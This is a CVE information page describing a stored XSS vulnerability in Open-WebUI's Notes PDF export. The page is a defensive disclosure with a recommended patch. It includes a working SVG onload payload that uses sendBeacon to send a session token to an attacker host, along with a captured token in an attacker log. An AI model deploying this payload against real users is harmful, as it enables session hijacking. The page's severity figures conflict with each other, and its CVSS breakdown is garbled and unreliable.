What is CVE-2025-65959?

## Summary A **Stored XSS vulnerability** has been discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to **execute arbitrary JavaScript code** and **steal session tokens** when a victim downloads the note as PDF. This vulnerability can be exploited by **any authenticated user**, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files. ## Details ### Vulnerability Location **File:** `src/lib/components/notes/utils.ts` **Function:** `downloadPdf()` **Vulnerable Code (Line 35):** ```typescript const contentNode = document.createElement('div'); contentNode.innerHTML = html; // Direct assignment without DOMPurify sanitization node.appendChild(contentNode); document.body.appendChild(node); ``` ### Root Cause 1. **Incomplete TipTap Editor Configuration** - Open-WebUI only uses TipTap StarterKit - No Schema definition for dangerous tags like SVG, Script - Unknown HTML tags are stored as raw HTML 2. **Missing Sanitization During PDF Generation** - `note.data.content.html` is directly assigned to `innerHTML` - No DOMPurify or other sanitization - Stored malicious HTML executes as-is ## PoC ### Environment - Open-WebUI latest version (v0.6.36) - Admin account ### Step 1: Create Malicious Markdown File **Filename:** `token_stealer.md` ```markdown ``` > navigator.sendBeacon() was used to bypass CORS. ### Step 2: Import to Notes 1. Login to Open-WebUI 2. Click **"Notes"** in the left menu 3. **Drag and drop** the Markdown file 4. Note is automatically created ### Step 3: Trigger PDF Download 1. Access Notes menu (/notes) 2. Click **⋯** on the right side of the uploaded note 3. Select **"Download"** → **"PDF document (.pdf)"** 4. JavaScript executes ### Step 4: Verify Token Theft **Attacker's server log:** ```http POST /steal HTTP/1.1 Host: redacted Content-Type: text/plain;charset=UTF-8 Content-Length: 145 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMjE4ZmU4LTU2MTktNGEzNS05MWZkLTM2MzA3NDU1NGFkNCJ9.zOicE5c5FJ3ZOc9j6T2xHU-K6dbz-s1ib_hIG4LayFw ``` ### And Simple PoC `alert(1)` **Filename:** `simple_poc.md` ```markdown ``` --- ## Impact **CVSS 3.1 Score: 8.7 (High)** ``` CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N ``` ### Vulnerability Type **CWE-79: Cross-site Scripting (XSS)** **CWE-116: Improper Encoding or Escaping of Output** ### Affected Users - **All Open-WebUI users** - Especially users utilizing the Notes feature ### Attack Scenario ``` 1. Attacker shares malicious note (.md file) in the community 2. Victim uploads the shared note (.md file) 3. Victim downloads as PDF 4. XSS vulnerability triggers 5. Victim's session (localStorage.token) is stolen ``` --- ## Recommended Patch ```typescript // src/lib/components/notes/utils.ts:35 import DOMPurify from 'dompurify'; const contentNode = document.createElement('div'); // Sanitize with DOMPurify contentNode.innerHTML = DOMPurify.sanitize(html, { ALLOWED_TAGS: [ 'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'ul', 'ol', 'li', 'a', 'code', 'pre', 'blockquote', 'table', 'thead', 'tbody', 'tr', 'td', 'th' ], ALLOWED_ATTR: ['href', 'class', 'target'], FORBID_TAGS: ['svg', 'script', 'iframe', 'object', 'embed', 'style'], FORBID_ATTR: ['onload', 'onerror', 'onclick', 'onmouseover', 'onfocus'], ALLOW_DATA_ATTR: false }); node.appendChild(contentNode); ``` --- ## References - OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html - DOMPurify: https://github.com/cure53/DOMPurify ---

What is the severity of CVE-2025-65959?

CVE-2025-65959 has a CVSS v3 score of 5.4, which is classified as Medium severity.

Is there an exploit available for CVE-2025-65959?

No known public exploits are currently available for CVE-2025-65959.

Is there a patch available for CVE-2025-65959?

Yes, patches are available for CVE-2025-65959. Check the vendor advisories for update instructions.

CVE-2025-65959 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v35.4

CVSS v20.0

Priority Score223.0

EPSS Score0.0

Medium

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

5.4

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

A Stored XSS vulnerability has been discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to execute arbitrary JavaScript code and steal session tokens when a victim downloads the note as PDF.

This vulnerability can be exploited by any authenticated user, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files.

Details

Vulnerability Location

File: src/lib/components/notes/utils.ts
Function: downloadPdf()
Vulnerable Code (Line 35):

const contentNode = document.createElement('div');

contentNode.innerHTML = html;  // Direct assignment without DOMPurify sanitization

node.appendChild(contentNode);
document.body.appendChild(node);

Root Cause

Incomplete TipTap Editor Configuration
- Open-WebUI only uses TipTap StarterKit
- No Schema definition for dangerous tags like SVG, Script
- Unknown HTML tags are stored as raw HTML
Missing Sanitization During PDF Generation
- note.data.content.html is directly assigned to innerHTML
- No DOMPurify or other sanitization
- Stored malicious HTML executes as-is

PoC

Environment

Open-WebUI latest version (v0.6.36)
Admin account

Step 1: Create Malicious Markdown File

Filename: token_stealer.md

<svg onload="navigator.sendBeacon('https://redacted/steal',localStorage.token)"></svg>

CVSS v3 Breakdown

Attack Vector:Network

Attack Complexity:Local

Privileges Required:Local

User Interaction:Required

Scope:Changed

Confidentiality:Local

Integrity:Local

Availability:Network

Patch References

Github.com Security [email protected]

Ready for Agentic Automated Testing?

CVE-2025-65959

Summary

Details

Vulnerability Location

Root Cause

PoC

Environment

Step 1: Create Malicious Markdown File

Step 2: Import to Notes

Step 3: Trigger PDF Download

Step 4: Verify Token Theft

And Simple PoC alert(1)

Impact

Vulnerability Type

Affected Users

Attack Scenario

Recommended Patch

References

And Simple PoC `alert(1)`